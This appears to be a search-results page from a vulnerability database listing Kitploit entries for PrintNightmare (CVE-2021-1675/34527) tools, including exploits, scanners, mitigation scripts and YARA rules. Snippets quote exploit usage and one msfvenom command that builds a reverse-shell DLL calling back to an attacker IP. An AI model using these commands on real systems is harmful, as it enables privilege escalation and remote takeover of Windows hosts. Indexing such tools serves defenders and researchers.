Lucene search
+L

251 matches found

Kitploit
Kitploit
added 2026/09/14 4:21 a.m.4 views

CVE-2021-1675_PrintNightMare

PrintNightmareScanner Escáner para detectar la vulnerabilidad de ejecución remota de código del servicio de cola de impresión de Windows CVE-2021-1675 Requisitos previos python3 python3 -m pip install -r Requirements.txt Uso python3 detectprintnightmare.py --help root@kitploit: usage:...

9.3CVSS8AI score0.86132EPSS
SaveExploits63References1
Kitploit
Kitploit
added 2026/09/14 3:53 a.m.5 views

PrintNightmare

Vulnerabilidad RCE en el servicio Print Spooler de Windows CVE-2021-1675 PrintNightmare ¿Cómo deshabilitar el servicio Print Spooler? Shell de CMD net start | findstr -i "spooler" net stop spooler REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start " /t REGDWORD /d "4" /f PowerShel...

9.3CVSS7.9AI score0.99792EPSS
SaveExploits75
Kitploit
Kitploit
added 2026/09/14 3:46 a.m.10 views

PrintNightmare-LPE

CVE-2021-1675PrintNightmare poc de shell del sistema para CVE-2021-1675 Elevación de privilegios de Windows Print Spooler créditos: Zhiniang Peng @edwardzpeng & Xuefeng Li @lxf02942370 Ref: https://github.com/afwu/PrintNightmare windows 10 windows server 2012 Crédito a todos los investigadores qu...

9.3CVSS7.9AI score0.86132EPSS
SaveExploits63References1
Kitploit
Kitploit
added 2026/09/14 12:59 a.m.5 views

CVE-2021-1675

CVE-2021-1675 - PrintNightmare LPE PowerShell Caleb Stewart | John Hammond | July 1, 2021 CVE-2021-1675 is a critical remote code execution and local privilege escalation vulnerability dubbed "PrintNightmare." Proof-of-concept exploits have been released Python, C++ for the remote code execution...

9.3CVSS8AI score0.86132EPSS
SaveExploits63References4
Kitploit
Kitploit
added 2026/09/13 11:42 p.m.7 views

Microsoft-CVE-2021-1675

Microsoft-CVE-2021-1675 He creado un pequeño proyecto en C que explota la vulnerabilidad CVE-2021-1675. Para más información sobre CVE-2021-1675, consulta mi publicación en el blog: https://thalpius.com/2021/07/16/windows-print-spooler-elevation-of-privilege-vulnerability-cve-2021-1675-explained...

9.3CVSS8AI score0.86132EPSS
SaveExploits63
Kitploit
Kitploit
added 2026/09/13 7:51 p.m.9 views

NimNightmare

CVE-2021-1675 LPE PoC not my exploit! just wanted to play around with the winim library in nim. Usage Generate DLL payload with msfvenom -p windows/x64/shellreversetcp LHOST=192.168.8.237 LPORT=4444 -f dll msfvenom.dll, then start the handler on your attacker. On the victim run .\nimnightmare.exe...

9.3CVSS7.8AI score0.86132EPSS
SaveExploits63
Kitploit
Kitploit
added 2026/09/13 6:28 p.m.13 views

cve-2021-1675

〖EXP〗Ladon Printer Vulnerability Privilege Escalation CVE-2021-1675 Reproduction http://k8gege.org/p/CVE-2021-1675.html Overview On June 9, Microsoft released the June security update patch, fixing 50 security vulnerabilities, including a Windows Print Spooler privilege escalation vulnerability,...

9.3CVSS7.8AI score0.86132EPSS
SaveExploits63References5
Kitploit
Kitploit
added 2026/09/13 6:20 p.m.7 views

CVE-2021-34527-1675

CVE-2021-34527-1675 Cve-2021-1675 or cve-2021-34527? Detailed analysis and exploitation of windows print spooler 0day vulnerability!!!...

9.3CVSS7.9AI score0.99792EPSS
SaveExploits75
Kitploit
Kitploit
added 2026/09/13 6:08 p.m.5 views

PrintNightmare

PrintNightmare Python implementation for PrintNightmare CVE-2021-1675 / CVE-2021-34527 using standard Impacket. Installtion root@kitploit: $ pip3 install impacket Usage root@kitploit: Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation usage: printnightmare.py -h -debug -port destination por...

9.3CVSS7.8AI score0.99792EPSS
SaveExploits75References4
Kitploit
Kitploit
added 2026/09/13 2:33 p.m.3 views

PrintNightmare-CVE-2021-1675

PrintNightmare-CVE-2021-1675 Youtube : https://youtu.be/Zr0KjYDSFKQ...

9.3CVSS7.9AI score0.86132EPSS
SaveExploits63
Kitploit
Kitploit
added 2026/09/13 2:28 p.m.4 views

PrintNightmare-CVE-2021-1675-CVE-2021-34527

CVE-2021-1675 / CVE-2021-34527 Impacket implementation of the PrintNightmare PoC originally created by Zhiniang Peng @edwardzpeng & Xuefeng Li @lxf02942370 Tested on a fully patched 2019 Domain Controller Execute malicious DLL's remote or locally Patch update Microsoft has released a patch to...

9.3CVSS7.9AI score0.99792EPSS
SaveExploits75References1
Kitploit
Kitploit
added 2026/09/13 2:16 p.m.6 views

CVE-2021-1675-PrintNightmare

CVE-2021-1675 - PrintNightmare LPE PowerShell Caleb Stewart | John Hammond | 1 de junio de 2021 CVE-2021-1675 es una vulnerabilidad crítica de ejecución remota de código y escalada local de privilegios conocida como "PrintNightmare". Se han publicado exploits de prueba de concepto Python, C++ par...

9.3CVSS7.9AI score0.86132EPSS
SaveExploits63References4
Kitploit
Kitploit
added 2026/09/13 1:38 p.m.4 views

CVE-2021-34527

CVE-2021-1675 / CVE-2021-34527 Two mini Script to check if the PrintSpooler Serivce is running within the Forest. CVE-2021-1675: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675 CVE-2021-34527 aka PrintNightmare...

9.3CVSS7.9AI score0.99792EPSS
SaveExploits75References2
Kitploit
Kitploit
added 2026/09/13 1:03 p.m.5 views

CVE-2021-1675-CVE-2021-34527

CVE-2021-1675 - PrintNightmare LPE PowerShell Caleb Stewart | John Hammond | 1 de julio de 2021 CVE-2021-1675 es una vulnerabilidad crítica de ejecución remota de código y escalada de privilegios local denominada "PrintNightmare". Se han publicado exploits de prueba de concepto Python, C++ para l...

9.3CVSS7.9AI score0.99792EPSS
SaveExploits75References4
Kitploit
Kitploit
added 2026/09/13 11:19 a.m.5 views

CVE-2021-1675

CVE-2021-1675 Fix without disabling Print Spooler Script checks the existance of de CVE-2021-1675 fix from Microsoft and removes members from the "Pre-Windows 2000 Compatible Access" group on the domain. Issues: With an empty "Pre-Windows 2000 Compatible Access" group the following things stop...

9.3CVSS7.9AI score0.86132EPSS
SaveExploits63
Kitploit
Kitploit
added 2026/09/13 11:19 a.m.4 views

CVE-2021-1675-Yara

Este repositorio no tiene un README...

9.3CVSS7.8AI score0.86132EPSS
SaveExploits63
Kitploit
Kitploit
added 2026/09/13 10:13 a.m.9 views

SharpPN

C PrintNightmare CVE-2021-1675 Necesitarás una DLL para usar SharpPN. Así que una vez que la tengas, solo compila y especifica la ruta de la DLL en los argumentos de la línea de comandos. Compilación Puedes compilarlo tú mismo con C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe -out:SharpPN.exe...

9.3CVSS7.9AI score0.86132EPSS
SaveExploits63References1
Kitploit
Kitploit
added 2026/09/13 10:00 a.m.16 views

CVE-2021-1675-LPE-EXP

CVE-2021-1675-LPE-EXP Simple LPE Exploit of CVE-2021-1675 Usage root@kitploit: CVE-2021-1675-LPE.exe C:\test\MyPigDLL.dll MyPigDLL.dll,is a test DLL which will create C:\test.txt if succeed Notice 1. Add EnumPrinterDriversW for get pDriverPath, so We dont need change the "hardcode Driver path"...

9.3CVSS8AI score0.86132EPSS
SaveExploits63
Kitploit
Kitploit
added 2026/09/13 9:18 a.m.4 views

patch-cve-2021-1675

This repository does not have a README...

9.3CVSS7.8AI score0.86132EPSS
SaveExploits63
Kitploit
Kitploit
added 2026/09/13 5:16 a.m.5 views

CVE-2021-1675

CVE-2021-1675 / CVE-2021-34527 Implementación de Impacket del PoC PrintNightmare creado originalmente por Zhiniang Peng @edwardzpeng y Xuefeng Li @lxf02942370 Probado en un controlador de dominio 2019 completamente parcheado Ejecutar DLL maliciosas de forma remota o local Instalación Antes de...

9.3CVSS8AI score0.99792EPSS
SaveExploits75References1
Rows per page
Query Builder